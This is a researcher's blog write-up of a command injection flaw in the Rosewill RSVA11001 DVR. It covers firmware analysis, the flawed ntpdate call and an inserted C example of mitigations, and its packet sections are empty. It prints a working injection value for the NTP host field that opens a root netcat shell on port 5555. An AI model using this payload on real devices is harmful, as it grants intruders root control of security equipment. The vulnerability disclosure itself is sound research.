Remote Command Injection Vulnerability in Rosewill RSVA11001

The Rosewill RSVA11001 is a home security DVR. I bought one and of course was not content to use it for its original purpose. It's based on a Huawei Hi3515. I downloaded the firmware and, with the help of binwalk, ripped it apart. The firmware is a confusing mess of different file system types and multiple Linux kernels.

I wanted to find a way to get a root shell on the device. Included with the device is a CD with some Windows-based monitoring software. Inspection of the firmware revealed an executable, hi_dvr, that runs on the device and listens on TCP port 8000 for control commands and on TCP port 9000 to stream video. Using the strings command on the executable I found this gem:

/mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp

So I used the Windows management software to set the NTP host to:

a;/usr/bin/nc -l -p 5555 -e /bin/sh&

Next I power cycled the box, and a shell was waiting a minute later on port 5555. Of course, the hi_dvr executable runs as root, so you gain root privileges with this method. By default it runs this command on startup and once a day thereafter.
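As an added illustration (my own code, not anything from the RSVA11001 firmware), here is the command-building pattern the `%s` format string above implies, next to two mitigations the vendor could have used: an allow-list check on the configured host, and running ntpdate through fork/execv with the redirect done in-process so no shell ever parses the host. The paths and the `-q` flag come from the page; the function names and the validation rules are assumptions.

```c
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern, reconstructed from the format string on the page: the
 * configured NTP host is pasted into a shell command line, so ';', '&', '|'
 * and similar characters in the host become shell syntax when it is run. */
int build_ntp_command_vulnerable(const char *host, char *cmd, size_t len) {
    int n = snprintf(cmd, len, "/mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp", host);
    return n > 0 && (size_t)n < len;
}

/* Mitigation 1 (assumed, not the vendor's code): allow-list the host. Letters,
 * digits, '.' and '-' only, bounded length, no empty labels, no leading or
 * trailing '.'/'-'. Covers hostnames and IPv4 literals; IPv6 needs its own. */
int is_valid_ntp_host(const char *host) {
    size_t len = strlen(host);
    if (len == 0 || len > 253) return 0;
    if (host[0] == '.' || host[0] == '-') return 0;
    if (host[len - 1] == '.' || host[len - 1] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;
        if (c == '.' && host[i + 1] == '.') return 0;
    }
    return 1;
}

/* Mitigation 2: no shell at all. fork/execv with an argv vector, redirect done
 * in the child; the host is one argument and is never parsed as a command. */
int run_ntpdate_noshell(const char *host) {
    if (!is_valid_ntp_host(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        int fd = open("/tmp/tmpfs/ntptmp", O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0) _exit(127);
        dup2(fd, STDOUT_FILENO);
        close(fd);
        char *const argv[] = {"/mnt/ntpdate", "-q", (char *)host, NULL};
        execv(argv[0], argv);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With the allow-list in place the NTP host string from this post is rejected before any command is built, and with execv the shell metacharacters would be harmless even if it were not.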

As it turns out, the "authentication" done on the command port is just a charade for the user of the management software. Other security researchers had previously identified this. You only need to replay the packets below to exploit the vulnerable shell execution.

The box is not very interesting once you are in. It's a Linux 2.6.24 kernel with RT patches and a BusyBox user space. I don't have access to the SDK for the Hi3515 (different from the Hi3511). The kernel modules for video input, video output, audio output, H.264 encoding, etc. are there, but in binary-only (non-stripped) form. You could probably do some cool hacking on this box, as it has two SATA ports inside.

Packets

Here are the base64 encodings of the packets I captured while conducting the exploit. You'll need to convert them from base64 and replay them with something like nc into a TCP connection to port 8000.

This packet sets the NTP host to the shell escape sequence.


This second request to the same port is required to cause the device to save the changes to its flash storage.


Other vulnerable units

The Rosewill RSVA12001 is the same unit with different supplied cameras and should have the same vulnerability.

Copyright Eric Urban 2013, or the respective entity where indicated